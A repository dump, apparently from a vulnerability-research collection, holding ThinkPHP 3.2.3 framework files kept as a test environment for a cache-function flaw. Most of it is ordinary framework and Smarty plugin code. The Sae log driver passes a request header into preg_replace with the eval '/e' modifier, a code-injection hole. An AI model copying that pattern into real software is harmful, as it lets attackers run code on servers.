@package ORG 17 | * @subpackage Util 18 | * @author liu21st 19 | */ 20 | class Stack extends ArrayList { 21 | 22 | /** 23 | * 架构函数 24 | * @access public 25 | * @param array $values 初始化数组元素 26 | */ 27 | public function __construct($values = array()) { 28 | parent::__construct($values); 29 | } 30 | 31 | /** 32 | * 将堆栈的内部指针指向第一个单元 33 | * @access public 34 | * @return mixed 35 | */ 36 | public function peek() { 37 | return reset($this->toArray()); 38 | } 39 | 40 | /** 41 | * 元素进栈 42 | * @access public 43 | * @param mixed $value 44 | * @return mixed 45 | */ 46 | public function push($value) { 47 | $this->add($value); 48 | return $value; 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Behavior.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think; 12 | /** 13 | * ThinkPHP Behavior基础类 14 | */ 15 | abstract class Behavior { 16 | /** 17 | * 执行行为 run方法是Behavior唯一的接口 18 | * @access public 19 | * @param mixed $params 行为参数 20 | * @return void 21 | */ 22 | abstract public function run(&$params); 23 | 24 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Controller/JsonRpcController.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Controller; 12 | /** 13 | * ThinkPHP JsonRPC控制器类 14 | */ 15 | class JsonRpcController { 16 | 17 | /** 18 | * 架构函数 19 | * @access public 20 | */ 21 | public function __construct() { 22 | //控制器初始化 23 | if(method_exists($this,'_initialize')) 24 | $this->_initialize(); 25 | //导入类库 26 | Vendor('jsonRPC.jsonRPCServer'); 27 | // 启动server 28 | \jsonRPCServer::handle($this); 29 | } 30 | 31 | /** 32 | * 魔术方法 有不存在的操作的时候执行 33 | * @access public 34 | * @param string $method 方法名 35 | * @param array $args 参数 36 | * @return mixed 37 | */ 38 | public function __call($method,$args){} 39 | } 40 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Controller/RpcController.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Controller; 12 | /** 13 | * ThinkPHP RPC控制器类 14 | */ 15 | class RpcController { 16 | 17 | protected $allowMethodList = ''; 18 | protected $debug = false; 19 | 20 | /** 21 | * 架构函数 22 | * @access public 23 | */ 24 | public function __construct() { 25 | //控制器初始化 26 | if(method_exists($this,'_initialize')) 27 | $this->_initialize(); 28 | //导入类库 29 | Vendor('phpRPC.phprpc_server'); 30 | //实例化phprpc 31 | $server = new \PHPRPC_Server(); 32 | if($this->allowMethodList){ 33 | $methods = $this->allowMethodList; 34 | }else{ 35 | $methods = get_class_methods($this); 36 | $methods = array_diff($methods,array('__construct','__call','_initialize')); 37 | } 38 | $server->add($methods,$this); 39 | 40 | if(APP_DEBUG || $this->debug ) { 41 | $server->setDebugMode(true); 42 | } 43 | $server->setEnableGZIP(true); 44 | $server->start(); 45 | echo $server->comment(); 46 | } 47 | 48 | /** 49 | * 魔术方法 有不存在的操作的时候执行 50 | * @access public 51 | * @param string $method 方法名 52 | * @param array $args 参数 53 | * @return mixed 54 | */ 55 | public function __call($method,$args){} 56 | } 57 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Controller/YarController.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Controller; 12 | /** 13 | * ThinkPHP Yar控制器类 14 | */ 15 | class YarController { 16 | 17 | /** 18 | * 架构函数 19 | * @access public 20 | */ 21 | public function __construct() { 22 | //控制器初始化 23 | if(method_exists($this,'_initialize')) 24 | $this->_initialize(); 25 | //判断扩展是否存在 26 | if(!extension_loaded('yar')) 27 | E(L('_NOT_SUPPORT_').':yar'); 28 | //实例化Yar_Server 29 | $server = new \Yar_Server($this); 30 | // 启动server 31 | $server->handle(); 32 | } 33 | 34 | /** 35 | * 魔术方法 有不存在的操作的时候执行 36 | * @access public 37 | * @param string $method 方法名 38 | * @param array $args 参数 39 | * @return mixed 40 | */ 41 | public function __call($method,$args){} 42 | } 43 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Crypt.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think; 12 | /** 13 | * 加密解密类 14 | */ 15 | class Crypt { 16 | 17 | private static $handler = ''; 18 | 19 | public static function init($type=''){ 20 | $type = $type?:C('DATA_CRYPT_TYPE'); 21 | $class = strpos($type,'\\')? $type: 'Think\\Crypt\\Driver\\'. ucwords(strtolower($type)); 22 | self::$handler = $class; 23 | } 24 | 25 | /** 26 | * 加密字符串 27 | * @param string $str 字符串 28 | * @param string $key 加密key 29 | * @param integer $expire 有效期(秒) 0 为永久有效 30 | * @return string 31 | */ 32 | public static function encrypt($data,$key,$expire=0){ 33 | if(empty(self::$handler)){ 34 | self::init(); 35 | } 36 | $class = self::$handler; 37 | return $class::encrypt($data,$key,$expire); 38 | } 39 | 40 | /** 41 | * 解密字符串 42 | * @param string $str 字符串 43 | * @param string $key 加密key 44 | * @return string 45 | */ 46 | public static function decrypt($data,$key){ 47 | if(empty(self::$handler)){ 48 | self::init(); 49 | } 50 | $class = self::$handler; 51 | return $class::decrypt($data,$key); 52 | } 53 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Exception.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think; 12 | /** 13 | * ThinkPHP系统异常基类 14 | */ 15 | class Exception extends \Exception { 16 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Log/Driver/Sae.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | namespace Think\Log\Driver; 13 | 14 | class Sae { 15 | 16 | protected $config = array( 17 | 'log_time_format' => ' c ', 18 | ); 19 | 20 | // 实例化并传入参数 21 | public function __construct($config=array()){ 22 | $this->config = array_merge($this->config,$config); 23 | } 24 | 25 | /** 26 | * 日志写入接口 27 | * @access public 28 | * @param string $log 日志信息 29 | * @param string $destination 写入目标 30 | * @return void 31 | */ 32 | public function write($log,$destination='') { 33 | static $is_debug=null; 34 | $now = date($this->config['log_time_format']); 35 | $logstr="[{$now}] ".$_SERVER['REMOTE_ADDR'].' '.$_SERVER['REQUEST_URI']."\r\n{$log}\r\n"; 36 | if(is_null($is_debug)){ 37 | preg_replace('@(\w+)\=([^;]*)@e', '$appSettings[\'\\1\']="\\2";', $_SERVER['HTTP_APPCOOKIE']); 38 | $is_debug = in_array($_SERVER['HTTP_APPVERSION'], explode(',', $appSettings['debug'])) ? true : false; 39 | } 40 | if($is_debug){ 41 | sae_set_display_errors(false);//记录日志不将日志打印出来 42 | } 43 | sae_debug($logstr); 44 | if($is_debug){ 45 | sae_set_display_errors(true); 46 | } 47 | 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Storage.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think; 12 | // 分布式文件存储类 13 | class Storage { 14 | 15 | /** 16 | * 操作句柄 17 | * @var string 18 | * @access protected 19 | */ 20 | static protected $handler ; 21 | 22 | /** 23 | * 连接分布式文件系统 24 | * @access public 25 | * @param string $type 文件类型 26 | * @param array $options 配置数组 27 | * @return void 28 | */ 29 | static public function connect($type='File',$options=array()) { 30 | $class = 'Think\\Storage\\Driver\\'.ucwords($type); 31 | self::$handler = new $class($options); 32 | } 33 | 34 | static public function __callstatic($method,$args){ 35 | //调用缓存驱动的方法 36 | if(method_exists(self::$handler, $method)){ 37 | return call_user_func_array(array(self::$handler,$method), $args); 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Template/Driver/Ease.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Template\Driver; 12 | /** 13 | * EaseTemplate模板引擎驱动 14 | */ 15 | class Ease { 16 | /** 17 | * 渲染模板输出 18 | * @access public 19 | * @param string $templateFile 模板文件名 20 | * @param array $var 模板变量 21 | * @return void 22 | */ 23 | public function fetch($templateFile,$var) { 24 | $templateFile = substr($templateFile,strlen(THEME_PATH),-5); 25 | $CacheDir = substr(CACHE_PATH,0,-1); 26 | $TemplateDir = substr(THEME_PATH,0,-1); 27 | vendor('EaseTemplate.template#ease'); 28 | $config = array( 29 | 'CacheDir' => $CacheDir, 30 | 'TemplateDir' => $TemplateDir, 31 | 'TplType' => 'html' 32 | ); 33 | if(C('TMPL_ENGINE_CONFIG')) { 34 | $config = array_merge($config,C('TMPL_ENGINE_CONFIG')); 35 | } 36 | $tpl = new \EaseTemplate($config); 37 | $tpl->set_var($var); 38 | $tpl->set_file($templateFile); 39 | $tpl->p(); 40 | } 41 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Template/Driver/Lite.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Template\Driver; 12 | /** 13 | * TemplateLite模板引擎驱动 14 | */ 15 | class Lite { 16 | /** 17 | * 渲染模板输出 18 | * @access public 19 | * @param string $templateFile 模板文件名 20 | * @param array $var 模板变量 21 | * @return void 22 | */ 23 | public function fetch($templateFile,$var) { 24 | vendor("TemplateLite.class#template"); 25 | $templateFile = substr($templateFile,strlen(THEME_PATH)); 26 | $tpl = new \Template_Lite(); 27 | $tpl->template_dir = THEME_PATH; 28 | $tpl->compile_dir = CACHE_PATH ; 29 | $tpl->cache_dir = TEMP_PATH ; 30 | if(C('TMPL_ENGINE_CONFIG')) { 31 | $config = C('TMPL_ENGINE_CONFIG'); 32 | foreach ($config as $key=>$val){ 33 | $tpl->{$key} = $val; 34 | } 35 | } 36 | $tpl->assign($var); 37 | $tpl->display($templateFile); 38 | } 39 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Template/Driver/Mobile.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Template\Driver; 12 | /** 13 | * MobileTemplate模板引擎驱动 14 | */ 15 | class Mobile { 16 | /** 17 | * 渲染模板输出 18 | * @access public 19 | * @param string $templateFile 模板文件名 20 | * @param array $var 模板变量 21 | * @return void 22 | */ 23 | public function fetch($templateFile,$var) { 24 | $templateFile=substr($templateFile,strlen(THEME_PATH)); 25 | $var['_think_template_path']=$templateFile; 26 | exit(json_encode($var)); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Template/Driver/Smart.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Template\Driver; 12 | /** 13 | * Smart模板引擎驱动 14 | */ 15 | class Smart { 16 | /** 17 | * 渲染模板输出 18 | * @access public 19 | * @param string $templateFile 模板文件名 20 | * @param array $var 模板变量 21 | * @return void 22 | */ 23 | public function fetch($templateFile,$var) { 24 | $templateFile = substr($templateFile,strlen(THEME_PATH)); 25 | vendor('SmartTemplate.class#smarttemplate'); 26 | $tpl = new \SmartTemplate($templateFile); 27 | $tpl->caching = C('TMPL_CACHE_ON'); 28 | $tpl->template_dir = THEME_PATH; 29 | $tpl->compile_dir = CACHE_PATH ; 30 | $tpl->cache_dir = TEMP_PATH ; 31 | if(C('TMPL_ENGINE_CONFIG')) { 32 | $config = C('TMPL_ENGINE_CONFIG'); 33 | foreach ($config as $key=>$val){ 34 | $tpl->{$key} = $val; 35 | } 36 | } 37 | $tpl->assign($var); 38 | $tpl->output(); 39 | } 40 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Template/Driver/Smarty.class.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace Think\Template\Driver; 12 | /** 13 | * Smarty模板引擎驱动 14 | */ 15 | class Smarty { 16 | 17 | /** 18 | * 渲染模板输出 19 | * @access public 20 | * @param string $templateFile 模板文件名 21 | * @param array $var 模板变量 22 | * @return void 23 | */ 24 | public function fetch($templateFile,$var) { 25 | $templateFile = substr($templateFile,strlen(THEME_PATH)); 26 | vendor('Smarty.Smarty#class'); 27 | $tpl = new \Smarty(); 28 | $tpl->caching = C('TMPL_CACHE_ON'); 29 | $tpl->template_dir = THEME_PATH; 30 | $tpl->compile_dir = CACHE_PATH ; 31 | $tpl->cache_dir = TEMP_PATH ; 32 | if(C('TMPL_ENGINE_CONFIG')) { 33 | $config = C('TMPL_ENGINE_CONFIG'); 34 | foreach ($config as $key=>$val){ 35 | $tpl->{$key} = $val; 36 | } 37 | } 38 | $tpl->assign($var); 39 | $tpl->display($templateFile); 40 | } 41 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/1.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/2.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/3.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/4.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/5.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/6.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/7.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/bgs/8.jpg -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/1.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/1.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/2.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/2.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/3.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/3.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/4.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/4.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/5.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/5.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/6.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Think/Verify/ttfs/6.ttf -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Boris/DumpInspector.php: -------------------------------------------------------------------------------- 1 | '1', //缓存ID 27 | 'TplType' =>'htm', //模板格式 28 | 'CacheDir' =>'cache', //缓存目录 29 | 'TemplateDir'=>'template' , //模板存放目录 30 | 'AutoImage' =>'on' , //自动解析图片目录开关 on表示开放 off表示关闭 31 | 'LangDir' =>'language' , //语言文件存放的目录 32 | 'Language' =>'default' , //语言的默认文件 33 | 'Copyright' =>'off' , //版权保护 34 | 'MemCache' =>'' , //Memcache服务器地址例如:127.0.0.1:11211 35 | ) 36 | ){ 37 | 38 | parent::ETCoreStart($set); 39 | } 40 | 41 | } 42 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Hprose/HproseFormatter.php: -------------------------------------------------------------------------------- 1 | * 20 | * * 21 | \**********************************************************/ 22 | 23 | require_once('HproseIOStream.php'); 24 | require_once('HproseReader.php'); 25 | require_once('HproseWriter.php'); 26 | 27 | class HproseFormatter { 28 | public static function serialize(&$var, $simple = false) { 29 | $stream = new HproseStringStream(); 30 | $hproseWriter = ($simple ? new HproseSimpleWriter($stream) : new HproseWriter($stream)); 31 | $hproseWriter->serialize($var); 32 | return $stream->toString(); 33 | } 34 | public static function &unserialize($data, $simple = false) { 35 | $stream = new HproseStringStream($data); 36 | $hproseReader = ($simple ? new HproseSimpleReader($stream) : new HproseReader($stream)); 37 | return $hproseReader->unserialize(); 38 | } 39 | } 40 | ?> 41 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Hprose/HproseIO.php: -------------------------------------------------------------------------------- 1 | * 20 | * * 21 | \**********************************************************/ 22 | 23 | require_once('HproseTags.php'); 24 | require_once('HproseClassManager.php'); 25 | require_once('HproseReader.php'); 26 | require_once('HproseWriter.php'); 27 | require_once('HproseFormatter.php'); 28 | 29 | ?> 30 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/README.txt: -------------------------------------------------------------------------------- 1 | 第三方类库包目录 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifier.regex_replace.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: regex_replace
14 | * Purpose: regular expression search/replace 15 | * 16 | * @link http://smarty.php.net/manual/en/language.modifier.regex.replace.php 17 | * regex_replace (Smarty online manual) 18 | * @author Monte Ohrt 19 | * @param string $string input string 20 | * @param string|array $search regular expression(s) to search for 21 | * @param string|array $replace string(s) that should be replaced 22 | * @return string 23 | */ 24 | function smarty_modifier_regex_replace($string, $search, $replace) 25 | { 26 | if(is_array($search)) { 27 | foreach($search as $idx => $s) { 28 | $search[$idx] = _smarty_regex_replace_check($s); 29 | } 30 | } else { 31 | $search = _smarty_regex_replace_check($search); 32 | } 33 | return preg_replace($search, $replace, $string); 34 | } 35 | 36 | /** 37 | * @param string $search string(s) that should be replaced 38 | * @return string 39 | * @ignore 40 | */ 41 | function _smarty_regex_replace_check($search) 42 | { 43 | // null-byte injection detection 44 | // anything behind the first null-byte is ignored 45 | if (($pos = strpos($search,"\0")) !== false) { 46 | $search = substr($search,0,$pos); 47 | } 48 | // remove eval-modifier from $search 49 | if (preg_match('!([a-zA-Z\s]+)$!s', $search, $match) && (strpos($match[1], 'e') !== false)) { 50 | $search = substr($search, 0, -strlen($match[1])) . preg_replace('![e\s]+!', '', $match[1]); 51 | } 52 | return $search; 53 | } 54 | 55 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifier.replace.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: replace
13 | * Purpose: simple search/replace 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.replace.php replace (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @author Uwe Tews 18 | * @param string $string input string 19 | * @param string $search text to search for 20 | * @param string $replace replacement text 21 | * @return string 22 | */ 23 | function smarty_modifier_replace($string, $search, $replace) 24 | { 25 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 26 | require_once(SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php'); 27 | return smarty_mb_str_replace($search, $replace, $string); 28 | } 29 | 30 | return str_replace($search, $replace, $string); 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifier.spacify.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: spacify
13 | * Purpose: add spaces between characters in a string 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.spacify.php spacify (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @param string $string input string 18 | * @param string $spacify_char string to insert between characters. 19 | * @return string 20 | */ 21 | function smarty_modifier_spacify($string, $spacify_char = ' ') 22 | { 23 | // well… what about charsets besides latin and UTF-8? 24 | return implode($spacify_char, preg_split('//u', $string, -1, PREG_SPLIT_NO_EMPTY)); 25 | } 26 | 27 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.cat.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: cat
14 | * Date: Feb 24, 2003
15 | * Purpose: catenate a value to a variable
16 | * Input: string to catenate
17 | * Example: {$var|cat:"foo"} 18 | * 19 | * @link http://smarty.php.net/manual/en/language.modifier.cat.php cat 20 | * (Smarty online manual) 21 | * @author Uwe Tews 22 | * @param array $params parameters 23 | * @return string with compiled code 24 | */ 25 | function smarty_modifiercompiler_cat($params, $compiler) 26 | { 27 | return '('.implode(').(', $params).')'; 28 | } 29 | 30 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.count_characters.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: count_characteres
14 | * Purpose: count the number of characters in a text 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.count.characters.php count_characters (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_count_characters($params, $compiler) 22 | { 23 | if (!isset($params[1]) || $params[1] != 'true') { 24 | return 'preg_match_all(\'/[^\s]/u\',' . $params[0] . ', $tmp)'; 25 | } 26 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 27 | return 'mb_strlen(' . $params[0] . ', SMARTY_RESOURCE_CHAR_SET)'; 28 | } 29 | // no MBString fallback 30 | return 'strlen(' . $params[0] . ')'; 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.count_paragraphs.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: count_paragraphs
14 | * Purpose: count the number of paragraphs in a text 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 17 | * count_paragraphs (Smarty online manual) 18 | * @author Uwe Tews 19 | * @param array $params parameters 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_paragraphs($params, $compiler) 23 | { 24 | // count \r or \n characters 25 | return '(preg_match_all(\'#[\r\n]+#\', ' . $params[0] . ', $tmp)+1)'; 26 | } 27 | 28 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.count_sentences.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: count_sentences 14 | * Purpose: count the number of sentences in a text 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 17 | * count_sentences (Smarty online manual) 18 | * @author Uwe Tews 19 | * @param array $params parameters 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_sentences($params, $compiler) 23 | { 24 | // find periods, question marks, exclamation marks with a word before but not after. 25 | return 'preg_match_all("#\w[\.\?\!](\W|$)#uS", ' . $params[0] . ', $tmp)'; 26 | } 27 | 28 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.count_words.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: count_words
